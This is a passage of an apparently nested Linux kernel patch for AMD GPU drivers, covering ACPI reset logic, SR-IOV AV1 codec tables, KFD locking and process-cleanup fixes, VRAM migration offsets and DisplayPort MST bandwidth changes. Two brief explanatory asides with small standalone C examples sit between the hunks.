+ 			    acpi_gpiochip_alloc_event, acpi_gpio);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index f873692071032..00a92e935ff0f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -981,7 +981,12 @@ static bool amdgpu_atcs_pci_probe_handle(struct pci_dev *pdev)
+  */
+ bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
+ {
+-	if (adev->flags & AMD_IS_APU)
++	if ((adev->flags & AMD_IS_APU) &&
++	    adev->gfx.imu.funcs) /* No need to do mode2 reset for IMU-enabled APUs */
++		return false;
++
++	if ((adev->flags & AMD_IS_APU) &&
++	    amdgpu_acpi_is_s3_active(adev))
+ 		return false;
+ 
+ 	if (amdgpu_sriov_vf(adev))
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+index 2b9d806e23afb..10a0a510910b6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+@@ -123,6 +123,8 @@ enum AMDGIM_FEATURE_FLAG {
+ 	AMDGIM_FEATURE_PP_ONE_VF = (1 << 4),
+ 	/* Indirect Reg Access enabled */
+ 	AMDGIM_FEATURE_INDIRECT_REG_ACCESS = (1 << 5),
++	/* AV1 support mode */
++	AMDGIM_FEATURE_AV1_SUPPORT = (1 << 6),
+ };
+ 
+ enum AMDGIM_REG_ACCESS_FLAG {
+@@ -321,6 +323,8 @@ static inline bool is_virtual_machine(void)
+ 	((!amdgpu_in_reset(adev)) && adev->virt.tdr_debug)
+ #define amdgpu_sriov_is_normal(adev) \
+ 	((!amdgpu_in_reset(adev)) && (!adev->virt.tdr_debug))
++#define amdgpu_sriov_is_av1_support(adev) \
++	((adev)->virt.gim_feature & AMDGIM_FEATURE_AV1_SUPPORT)
+ bool amdgpu_virt_mmio_blocked(struct amdgpu_device *adev);
+ void amdgpu_virt_init_setting(struct amdgpu_device *adev);
+ void amdgpu_virt_kiq_reg_write_reg_wait(struct amdgpu_device *adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgv_sriovmsg.h b/drivers/gpu/drm/amd/amdgpu/amdgv_sriovmsg.h
+index 6c97148ca0ed3..24d42d24e6a01 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgv_sriovmsg.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgv_sriovmsg.h
+@@ -93,7 +93,8 @@ union amd_sriov_msg_feature_flags {
+ 		uint32_t mm_bw_management  : 1;
+ 		uint32_t pp_one_vf_mode	   : 1;
+ 		uint32_t reg_indirect_acc  : 1;
+-		uint32_t reserved	   : 26;
++		uint32_t av1_support       : 1;
++		uint32_t reserved	   : 25;
+ 	} flags;
+ 	uint32_t all;
+ };
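+
The feature word is a classic guest/host ABI construct: a union of named single-bit fields over a raw uint32_t, where adding av1_support means taking one bit from the reserved run so the total stays 32. A standalone illustration (the field subset is made up; note that bit order inside a C bitfield is implementation-defined, so the real ABI depends on both sides' compilers agreeing):

#include <stdint.h>
#include <stdio.h>

union feature_flags {
	struct {
		uint32_t error_log_collect : 1;	/* illustrative subset */
		uint32_t av1_support       : 1;
		uint32_t reserved          : 30;	/* keeps the total at 32 */
	} flags;
	uint32_t all;
};

int main(void)
{
	union feature_flags f = { .all = 0 };

	f.flags.av1_support = 1;
	printf("raw word: 0x%08x\n", f.all);	/* typically bit 1 set */
	return 0;
}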
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 3d938b52178e3..9eedc1a1494c0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -101,6 +101,59 @@ static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn1 =
+ 	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn1,
+ };
+ 
++/* SRIOV SOC21, not const since data is controlled by host */
++static struct amdgpu_video_codec_info sriov_vcn_4_0_0_video_codecs_encode_array_vcn0[] = {
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_AV1, 8192, 4352, 0)},
++};
++
++static struct amdgpu_video_codec_info sriov_vcn_4_0_0_video_codecs_encode_array_vcn1[] = {
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
++};
++
++static struct amdgpu_video_codecs sriov_vcn_4_0_0_video_codecs_encode_vcn0 = {
++	.codec_count = ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_encode_array_vcn0),
++	.codec_array = sriov_vcn_4_0_0_video_codecs_encode_array_vcn0,
++};
++
++static struct amdgpu_video_codecs sriov_vcn_4_0_0_video_codecs_encode_vcn1 = {
++	.codec_count = ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_encode_array_vcn1),
++	.codec_array = sriov_vcn_4_0_0_video_codecs_encode_array_vcn1,
++};
++
++static struct amdgpu_video_codec_info sriov_vcn_4_0_0_video_codecs_decode_array_vcn0[] = {
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_AV1, 8192, 4352, 0)},
++};
++
++static struct amdgpu_video_codec_info sriov_vcn_4_0_0_video_codecs_decode_array_vcn1[] = {
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
++};
++
++static struct amdgpu_video_codecs sriov_vcn_4_0_0_video_codecs_decode_vcn0 = {
++	.codec_count = ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_decode_array_vcn0),
++	.codec_array = sriov_vcn_4_0_0_video_codecs_decode_array_vcn0,
++};
++
++static struct amdgpu_video_codecs sriov_vcn_4_0_0_video_codecs_decode_vcn1 = {
++	.codec_count = ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_decode_array_vcn1),
++	.codec_array = sriov_vcn_4_0_0_video_codecs_decode_array_vcn1,
++};
++
+ static int soc21_query_video_codecs(struct amdgpu_device *adev, bool encode,
+ 				 const struct amdgpu_video_codecs **codecs)
+ {
+@@ -111,16 +164,31 @@ static int soc21_query_video_codecs(struct amdgpu_device *adev, bool encode,
+ 	case IP_VERSION(4, 0, 0):
+ 	case IP_VERSION(4, 0, 2):
+ 	case IP_VERSION(4, 0, 4):
+-		if (adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) {
+-			if (encode)
+-				*codecs = &vcn_4_0_0_video_codecs_encode_vcn1;
+-			else
+-				*codecs = &vcn_4_0_0_video_codecs_decode_vcn1;
++		if (amdgpu_sriov_vf(adev)) {
++			if ((adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) ||
++			!amdgpu_sriov_is_av1_support(adev)) {
++				if (encode)
++					*codecs = &sriov_vcn_4_0_0_video_codecs_encode_vcn1;
++				else
++					*codecs = &sriov_vcn_4_0_0_video_codecs_decode_vcn1;
++			} else {
++				if (encode)
++					*codecs = &sriov_vcn_4_0_0_video_codecs_encode_vcn0;
++				else
++					*codecs = &sriov_vcn_4_0_0_video_codecs_decode_vcn0;
++			}
+ 		} else {
+-			if (encode)
+-				*codecs = &vcn_4_0_0_video_codecs_encode_vcn0;
+-			else
+-				*codecs = &vcn_4_0_0_video_codecs_decode_vcn0;
++			if ((adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0)) {
++				if (encode)
++					*codecs = &vcn_4_0_0_video_codecs_encode_vcn1;
++				else
++					*codecs = &vcn_4_0_0_video_codecs_decode_vcn1;
++			} else {
++				if (encode)
++					*codecs = &vcn_4_0_0_video_codecs_encode_vcn0;
++				else
++					*codecs = &vcn_4_0_0_video_codecs_decode_vcn0;
++			}
+ 		}
+ 		return 0;
+ 	default:
+@@ -729,8 +797,23 @@ static int soc21_common_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+-	if (amdgpu_sriov_vf(adev))
++	if (amdgpu_sriov_vf(adev)) {
+ 		xgpu_nv_mailbox_get_irq(adev);
++		if ((adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) ||
++		!amdgpu_sriov_is_av1_support(adev)) {
++			amdgpu_virt_update_sriov_video_codec(adev,
++							     sriov_vcn_4_0_0_video_codecs_encode_array_vcn1,
++							     ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_encode_array_vcn1),
++							     sriov_vcn_4_0_0_video_codecs_decode_array_vcn1,
++							     ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_decode_array_vcn1));
++		} else {
++			amdgpu_virt_update_sriov_video_codec(adev,
++							     sriov_vcn_4_0_0_video_codecs_encode_array_vcn0,
++							     ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_encode_array_vcn0),
++							     sriov_vcn_4_0_0_video_codecs_decode_array_vcn0,
++							     ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_decode_array_vcn0));
++		}
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index f79b8e964140e..e191d38f3da62 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1298,14 +1298,14 @@ static int kfd_ioctl_map_memory_to_gpu(struct file *filep,
+ 		args->n_success = i+1;
+ 	}
+ 
+-	mutex_unlock(&p->mutex);
+-
+ 	err = amdgpu_amdkfd_gpuvm_sync_memory(dev->adev, (struct kgd_mem *) mem, true);
+ 	if (err) {
+ 		pr_debug("Sync memory failed, wait interrupted by user signal\n");
+ 		goto sync_memory_failed;
+ 	}
+ 
++	mutex_unlock(&p->mutex);
++
+ 	/* Flush TLBs after waiting for the page table updates to complete */
+ 	for (i = 0; i < args->n_devices; i++) {
+ 		peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+@@ -1321,9 +1321,9 @@ get_process_device_data_failed:
+ bind_process_to_device_failed:
+ get_mem_obj_from_handle_failed:
+ map_memory_to_gpu_failed:
++sync_memory_failed:
+ 	mutex_unlock(&p->mutex);
+ copy_from_user_failed:
+-sync_memory_failed:
+ 	kfree(devices_arr);
+ 
+ 	return err;
+@@ -1337,6 +1337,7 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 	void *mem;
+ 	long err = 0;
+ 	uint32_t *devices_arr = NULL, i;
++	bool flush_tlb;
+ 
+ 	if (!args->n_devices) {
+ 		pr_debug("Device IDs array empty\n");
+@@ -1389,16 +1390,19 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 		}
+ 		args->n_success = i+1;
+ 	}
+-	mutex_unlock(&p->mutex);
+ 
+-	if (kfd_flush_tlb_after_unmap(pdd->dev)) {
++	flush_tlb = kfd_flush_tlb_after_unmap(pdd->dev);
++	if (flush_tlb) {
+ 		err = amdgpu_amdkfd_gpuvm_sync_memory(pdd->dev->adev,
+ 				(struct kgd_mem *) mem, true);
+ 		if (err) {
+ 			pr_debug("Sync memory failed, wait interrupted by user signal\n");
+ 			goto sync_memory_failed;
+ 		}
++	}
++	mutex_unlock(&p->mutex);
+ 
++	if (flush_tlb) {
+ 		/* Flush TLBs after waiting for the page table updates to complete */
+ 		for (i = 0; i < args->n_devices; i++) {
+ 			peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+@@ -1414,9 +1418,9 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ bind_process_to_device_failed:
+ get_mem_obj_from_handle_failed:
+ unmap_memory_from_gpu_failed:
++sync_memory_failed:
+ 	mutex_unlock(&p->mutex);
+ copy_from_user_failed:
+-sync_memory_failed:
+ 	kfree(devices_arr);
+ 	return err;
+ }
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+index 10048ce16aea4..5c8506f180140 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+@@ -289,7 +289,7 @@ static unsigned long svm_migrate_unsuccessful_pages(struct migrate_vma *migrate)
+ static int
+ svm_migrate_copy_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 			 struct migrate_vma *migrate, struct dma_fence **mfence,
+-			 dma_addr_t *scratch)
++			 dma_addr_t *scratch, uint64_t ttm_res_offset)
+ {
+ 	uint64_t npages = migrate->npages;
+ 	struct device *dev = adev->dev;
+@@ -299,19 +299,13 @@ svm_migrate_copy_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 	uint64_t i, j;
+ 	int r;
+ 
+-	pr_debug("svms 0x%p [0x%lx 0x%lx]\n", prange->svms, prange->start,
+-		 prange->last);
++	pr_debug("svms 0x%p [0x%lx 0x%lx 0x%llx]\n", prange->svms, prange->start,
++		 prange->last, ttm_res_offset);
+ 
+ 	src = scratch;
+ 	dst = (uint64_t *)(scratch + npages);
+ 
+-	r = svm_range_vram_node_new(adev, prange, true);
+-	if (r) {
+-		dev_dbg(adev->dev, "fail %d to alloc vram\n", r);
+-		goto out;
+-	}
+-
+-	amdgpu_res_first(prange->ttm_res, prange->offset << PAGE_SHIFT,
++	amdgpu_res_first(prange->ttm_res, ttm_res_offset,
+ 			 npages << PAGE_SHIFT, &cursor);
+ 	for (i = j = 0; i < npages; i++) {
+ 		struct page *spage;
+@@ -391,14 +385,14 @@ out_free_vram_pages:
+ 		migrate->dst[i + 3] = 0;
+ 	}
+ #endif
+-out:
++
+ 	return r;
+ }
+ 
+ static long
+ svm_migrate_vma_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 			struct vm_area_struct *vma, uint64_t start,
+-			uint64_t end, uint32_t trigger)
++			uint64_t end, uint32_t trigger, uint64_t ttm_res_offset)
+ {
+ 	struct kfd_process *p = container_of(prange->svms, struct kfd_process, svms);
+ 	uint64_t npages = (end - start) >> PAGE_SHIFT;
+@@ -451,7 +445,7 @@ svm_migrate_vma_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 	else
+ 		pr_debug("0x%lx pages migrated\n", cpages);
+ 
+-	r = svm_migrate_copy_to_vram(adev, prange, &migrate, &mfence, scratch);
++	r = svm_migrate_copy_to_vram(adev, prange, &migrate, &mfence, scratch, ttm_res_offset);
+ 	migrate_vma_pages(&migrate);
+ 
+ 	pr_debug("successful/cpages/npages 0x%lx/0x%lx/0x%lx\n",
+@@ -499,6 +493,7 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 	unsigned long addr, start, end;
+ 	struct vm_area_struct *vma;
+ 	struct amdgpu_device *adev;
++	uint64_t ttm_res_offset;
+ 	unsigned long cpages = 0;
+ 	long r = 0;
+ 
+@@ -520,6 +515,13 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 	start = prange->start << PAGE_SHIFT;
+ 	end = (prange->last + 1) << PAGE_SHIFT;
+ 
++	r = svm_range_vram_node_new(adev, prange, true);
++	if (r) {
++		dev_dbg(adev->dev, "fail %ld to alloc vram\n", r);
++		return r;
++	}
++	ttm_res_offset = prange->offset << PAGE_SHIFT;
++
+ 	for (addr = start; addr < end;) {
+ 		unsigned long next;
+ 
+@@ -528,18 +530,21 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 			break;
+ 
+ 		next = min(vma->vm_end, end);
+-		r = svm_migrate_vma_to_vram(adev, prange, vma, addr, next, trigger);
++		r = svm_migrate_vma_to_vram(adev, prange, vma, addr, next, trigger, ttm_res_offset);
+ 		if (r < 0) {
+ 			pr_debug("failed %ld to migrate\n", r);
+ 			break;
+ 		} else {
+ 			cpages += r;
+ 		}
++		ttm_res_offset += next - addr;
+ 		addr = next;
+ 	}
+ 
+ 	if (cpages)
+ 		prange->actual_loc = best_loc;
++	else
++		svm_range_vram_node_free(prange);
+ 
+ 	return r < 0 ? r : 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_module.c b/drivers/gpu/drm/amd/amdkfd/kfd_module.c
+index 09b966dc37681..aee2212e52f69 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_module.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_module.c
+@@ -77,6 +77,7 @@ err_ioctl:
+ 
+ static void kfd_exit(void)
+ {
++	kfd_cleanup_processes();
+ 	kfd_debugfs_fini();
+ 	kfd_process_destroy_wq();
+ 	kfd_procfs_shutdown();
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+index 552c3ac85a132..7dc55919993c0 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+@@ -926,6 +926,7 @@ bool kfd_dev_is_large_bar(struct kfd_dev *dev);
+ 
+ int kfd_process_create_wq(void);
+ void kfd_process_destroy_wq(void);
++void kfd_cleanup_processes(void);
+ struct kfd_process *kfd_create_process(struct file *filep);
+ struct kfd_process *kfd_get_process(const struct task_struct *task);
+ struct kfd_process *kfd_lookup_process_by_pasid(u32 pasid);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process.c b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+index 51b1683ac5c1e..4d9f2d1c49b1d 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+@@ -1167,6 +1167,17 @@ static void kfd_process_free_notifier(struct mmu_notifier *mn)
+ 	kfd_unref_process(container_of(mn, struct kfd_process, mmu_notifier));
+ }
+ 
++static void kfd_process_notifier_release_internal(struct kfd_process *p)
++{
++	cancel_delayed_work_sync(&p->eviction_work);
++	cancel_delayed_work_sync(&p->restore_work);
++
++	/* Indicate to other users that MM is no longer valid */
++	p->mm = NULL;
++
++	mmu_notifier_put(&p->mmu_notifier);
++}
++
+ static void kfd_process_notifier_release(struct mmu_notifier *mn,
+ 					struct mm_struct *mm)
+ {
+@@ -1181,17 +1192,22 @@ static void kfd_process_notifier_release(struct mmu_notifier *mn,
+ 		return;
+ 
+ 	mutex_lock(&kfd_processes_mutex);
++	/*
++	 * Return early if the table is empty.
++	 *
++	 * This can happen if this function is called concurrently
++	 * by mmu_notifier and by kfd_cleanup_processes.
++	 *
++	 */
++	if (hash_empty(kfd_processes_table)) {
++		mutex_unlock(&kfd_processes_mutex);
++		return;
++	}
+ 	hash_del_rcu(&p->kfd_processes);
+ 	mutex_unlock(&kfd_processes_mutex);
+ 	synchronize_srcu(&kfd_processes_srcu);
+ 
+-	cancel_delayed_work_sync(&p->eviction_work);
+-	cancel_delayed_work_sync(&p->restore_work);
+-
+-	/* Indicate to other users that MM is no longer valid */
+-	p->mm = NULL;
+-
+-	mmu_notifier_put(&p->mmu_notifier);
++	kfd_process_notifier_release_internal(p);
+ }
+ 
+ static const struct mmu_notifier_ops kfd_process_mmu_notifier_ops = {
+@@ -1200,6 +1216,43 @@ static const struct mmu_notifier_ops kfd_process_mmu_notifier_ops = {
+ 	.free_notifier = kfd_process_free_notifier,
+ };
+ 
++/*
++ * This code handles the case when the driver is being unloaded before all
++ * mm_struct are released.  We need to safely free the kfd_process and
++ * avoid race conditions with mmu_notifier that might try to free them.
++ *
++ */
++void kfd_cleanup_processes(void)
++{
++	struct kfd_process *p;
++	struct hlist_node *p_temp;
++	unsigned int temp;
++	HLIST_HEAD(cleanup_list);
++
++	/*
++	 * Move all remaining kfd_process from the process table to a
++	 * temp list for processing. Once done, the mmu_notifier release
++	 * callback will not find the kfd_process in the table and will
++	 * return early, avoiding double-free issues.
++	 */
++	mutex_lock(&kfd_processes_mutex);
++	hash_for_each_safe(kfd_processes_table, temp, p_temp, p, kfd_processes) {
++		hash_del_rcu(&p->kfd_processes);
++		synchronize_srcu(&kfd_processes_srcu);
++		hlist_add_head(&p->kfd_processes, &cleanup_list);
++	}
++	mutex_unlock(&kfd_processes_mutex);
++
++	hlist_for_each_entry_safe(p, p_temp, &cleanup_list, kfd_processes)
++		kfd_process_notifier_release_internal(p);
++
++	/*
++	 * Ensure that all outstanding free_notifier callbacks run, triggering
++	 * the release of the kfd_process struct.
++	 */
++	mmu_notifier_synchronize();
++}
++
+ static int kfd_process_init_cwsr_apu(struct kfd_process *p, struct file *filep)
+ {
+ 	unsigned long  offset;
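+
kfd_cleanup_processes() uses the standard teardown shape for a lock-protected table: unlink everything under the lock onto a private list, then release each entry outside the lock, so a racing mmu_notifier path only ever sees an empty table. A standalone sketch with pthreads standing in for the kernel mutex (not kernel code):

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

struct node { int id; struct node *next; };

static struct node *table;	/* shared, lock-protected */
static pthread_mutex_t table_lock = PTHREAD_MUTEX_INITIALIZER;

static void cleanup_all(void)
{
	struct node *cleanup = NULL, *n;

	pthread_mutex_lock(&table_lock);
	while ((n = table) != NULL) {	/* unlink under the lock */
		table = n->next;
		n->next = cleanup;
		cleanup = n;
	}
	pthread_mutex_unlock(&table_lock);

	while ((n = cleanup) != NULL) {	/* release outside the lock */
		cleanup = n->next;
		printf("releasing %d\n", n->id);
		free(n);
	}
}

int main(void)
{
	for (int i = 0; i < 3; i++) {
		struct node *n = malloc(sizeof(*n));

		n->id = i;
		n->next = table;
		table = n;
	}
	cleanup_all();
	return 0;
}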
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
+index 5137476ec18e6..4236539d9f932 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
+@@ -218,8 +218,8 @@ static int init_user_queue(struct process_queue_manager *pqm,
+ 	return 0;
+ 
+ cleanup:
+-	if (dev->shared_resources.enable_mes)
+-		uninit_queue(*q);
++	uninit_queue(*q);
++	*q = NULL;
+ 	return retval;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.c
+index a7fd98f57f94c..dc62375a8e2c4 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.c
+@@ -495,7 +495,7 @@ static void update_config(void *handle, struct cp_psp_stream_config *config)
+ 	link->dp.mst_enabled = config->mst_enabled;
+ 	link->dp.usb4_enabled = config->usb4_enabled;
+ 	display->adjust.disable = MOD_HDCP_DISPLAY_DISABLE_AUTHENTICATION;
+-	link->adjust.auth_delay = 0;
++	link->adjust.auth_delay = 2;
+ 	link->adjust.hdcp1.disable = 0;
+ 	conn_state = aconnector->base.state;
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index abdbd4352f6f3..60dd88666437d 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -208,6 +208,21 @@ bool needs_dsc_aux_workaround(struct dc_link *link)
+ 	return false;
+ }
+ 
++bool is_synaptics_cascaded_panamera(struct dc_link *link, struct drm_dp_mst_port *port)
++{
++	u8 branch_vendor_data[4] = { 0 }; // Vendor data 0x50C ~ 0x50F
++
++	if (drm_dp_dpcd_read(port->mgr->aux, DP_BRANCH_VENDOR_SPECIFIC_START, &branch_vendor_data, 4) == 4) {
++		if (link->dpcd_caps.branch_dev_id == DP_BRANCH_DEVICE_ID_90CC24 &&
++				IS_SYNAPTICS_CASCADED_PANAMERA(link->dpcd_caps.branch_dev_name, branch_vendor_data)) {
++			DRM_INFO("Synaptics Cascaded MST hub\n");
++			return true;
++		}
++	}
++
++	return false;
++}
++
+ static bool validate_dsc_caps_on_connector(struct amdgpu_dm_connector *aconnector)
+ {
+ 	struct dc_sink *dc_sink = aconnector->dc_sink;
+@@ -231,6 +246,10 @@ static bool validate_dsc_caps_on_connector(struct amdgpu_dm_connector *aconnecto
+ 	    needs_dsc_aux_workaround(aconnector->dc_link))
+ 		aconnector->dsc_aux = &aconnector->mst_port->dm_dp_aux.aux;
+ 
++	/* synaptics cascaded MST hub case */
++	if (!aconnector->dsc_aux && is_synaptics_cascaded_panamera(aconnector->dc_link, port))
++		aconnector->dsc_aux = port->mgr->aux;
++
+ 	if (!aconnector->dsc_aux)
+ 		return false;
+ 
+@@ -627,12 +646,25 @@ struct dsc_mst_fairness_params {
+ 	struct amdgpu_dm_connector *aconnector;
+ };
+ 
+-static int kbps_to_peak_pbn(int kbps)
++static uint16_t get_fec_overhead_multiplier(struct dc_link *dc_link)
++{
++	u8 link_coding_cap;
++	uint16_t fec_overhead_multiplier_x1000 = PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B;
++
++	link_coding_cap = dc_link_dp_mst_decide_link_encoding_format(dc_link);
++	if (link_coding_cap == DP_128b_132b_ENCODING)
++		fec_overhead_multiplier_x1000 = PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B;
++
++	return fec_overhead_multiplier_x1000;
++}
++
++static int kbps_to_peak_pbn(int kbps, uint16_t fec_overhead_multiplier_x1000)
+ {
+ 	u64 peak_kbps = kbps;
+ 
+ 	peak_kbps *= 1006;
+-	peak_kbps = div_u64(peak_kbps, 1000);
++	peak_kbps *= fec_overhead_multiplier_x1000;
++	peak_kbps = div_u64(peak_kbps, 1000 * 1000);
+ 	return (int) DIV64_U64_ROUND_UP(peak_kbps * 64, (54 * 8 * 1000));
+ }
+ 
+@@ -726,11 +758,12 @@ static int increase_dsc_bpp(struct drm_atomic_state *state,
+ 	int link_timeslots_used;
+ 	int fair_pbn_alloc;
+ 	int ret = 0;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	for (i = 0; i < count; i++) {
+ 		if (vars[i + k].dsc_enabled) {
+ 			initial_slack[i] =
+-			kbps_to_peak_pbn(params[i].bw_range.max_kbps) - vars[i + k].pbn;
++			kbps_to_peak_pbn(params[i].bw_range.max_kbps, fec_overhead_multiplier_x1000) - vars[i + k].pbn;
+ 			bpp_increased[i] = false;
+ 			remaining_to_increase += 1;
+ 		} else {
+@@ -826,6 +859,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 	int next_index;
+ 	int remaining_to_try = 0;
+ 	int ret;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	for (i = 0; i < count; i++) {
+ 		if (vars[i + k].dsc_enabled
+@@ -855,7 +889,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 		if (next_index == -1)
+ 			break;
+ 
+-		vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.stream_kbps);
++		vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 		ret = drm_dp_atomic_find_time_slots(state,
+ 						    params[next_index].port->mgr,
+ 						    params[next_index].port,
+@@ -868,7 +902,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 			vars[next_index].dsc_enabled = false;
+ 			vars[next_index].bpp_x16 = 0;
+ 		} else {
